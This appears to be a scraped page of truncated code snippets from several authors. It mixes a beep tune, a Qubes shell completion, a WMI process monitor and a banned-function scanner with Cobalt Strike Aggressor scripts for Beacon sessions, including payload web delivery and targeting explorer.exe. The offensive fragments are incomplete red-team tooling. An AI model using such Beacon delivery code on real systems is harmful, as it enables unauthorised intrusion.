SadProcessor

function Get-RickAstley(){
[console]::beep(440,150)#A
[console]::beep(493,150)#B
[console]::beep(587,150)#D
[console]::beep(493,150)#B
Start-Sleep -m 20
[console]::beep(698,400)#F
[console]::beep(698,400)#F
[console]::beep(659,500)#E
Start-Sleep -m 50

rsmudge

# getexplorerpid($bid, &callback);
sub getexplorerpid {
  bps($1, lambda({
    local('$pid $name $entry');
    foreach $entry (split("\n", $2)) {
      ($name, $pid) = split("\\s+", $entry);
      if ($name eq "explorer.exe") {
        # $1 is our Beacon ID, $pid is the PID of explorer.exe
        [$callback: $1, $pid];
      }

rsmudge

#
# Aggressor Script means to parse/use environment vars in a Beacon session.
#

global('%bvars');

# request environment variables for every new Beacon that comes in.
on beacon_initial {
	# ideally, we'd have a bshell that could take callbacks. We don't have
	# this yet. Eventually though, we will.

0xffhh

sub IsSafe {
	#http://sleep.dashnine.org/manual/index.html
	local('$pos');
	@badchars = @(";", "&", '$', "'");
	foreach $index => $value (@badchars)
	{
		$pos = indexOf($1, $value);
		if (-isnumber $pos)
		{
			println("Invalid char detected");

mfowl

# This script locates potentially dangerous functions that could introduce a vulnerability if they are used incorrectly. 
#@author: VDA Labs (Michael Fowl)
#@category Functions

print "Searching for banned functions..."

# Microsoft SDL banned.h list.
blist = (["strcpy", "strcpyA", "strcpyW", "wcscpy", "_tcscpy", "_mbscpy", "StrCpy",
       "StrCpyA", "StrCpyW", "lstrcpy", "lstrcpyA", "lstrcpyW", "_tccpy", "_mbccpy",
       "_ftcscpy", "strcat", "strcatA", "strcatW", "wcscat", "_tcscat", "_mbscat",

rsmudge

# host a PowerShell script on a one-off web server via Beacon.
# 
# Why? Generate one-liners for length constrained command execution opportunities
#
# NOTE: this uses internal APIs and is subject to break in the next release. Don't hate!
#       if there's interest in this capability, I can build an official API for it.

import common.*;
import beacon.*;

kalkin

_qvm-run() {
    local app_vms 
    app_vms=( $(qvm-ls --raw-list|grep -v "^dom0$") )

    local exc=
    if (( words[(I)--all] )); then
        exc="*--exclude=[When --all is used: exclude this VM name (may be repeated)]:QubesVMs:($app_vms)"
    fi

    _arguments -S '(-a --auto)'{-a,--auto}'[Auto start the VM if not running]'\

N3mes1s

### ref: https://twitter.com/dez_/status/986614411711442944

Write-Host "Current Pid: " $Pid
(Get-Process -Id $pid).priorityclass = "RealTime"
$Query = 'SELECT * FROM __InstanceCreationEvent WITHIN 0.0001 WHERE TargetInstance ISA "Win32_Process"'

$action = {
    $e = $Event.SourceEventArgs.NewEvent.TargetInstance    
    $fmt = 'ProcessStarted: (ID={0,5}, Parent={1,5}, cmdline={2}, ExecutablePath="{3}, Name={4}")'
    $msg = $fmt -f $e.ProcessId, $e.ParentProcessId, $e.CommandLine, $e.ExecutablePath, $e.Name                  

dfirfpi

#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright 2017, Francesco "dfirfpi" Picasso <francesco.picasso@gmail.com>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#    http://www.apache.org/licenses/LICENSE-2.0

rsmudge

# Python Stageless Scripted Web Delivery

# setup our stageless Python Web Delivery attack
sub setup_attack {
	local('%options $x86payload $x64payload $url $script');
	%options = $3;

	# generate our stageless x86 payload
	artifact_stageless(%options["listener"], "raw", "x86", $null, $this);
	yield;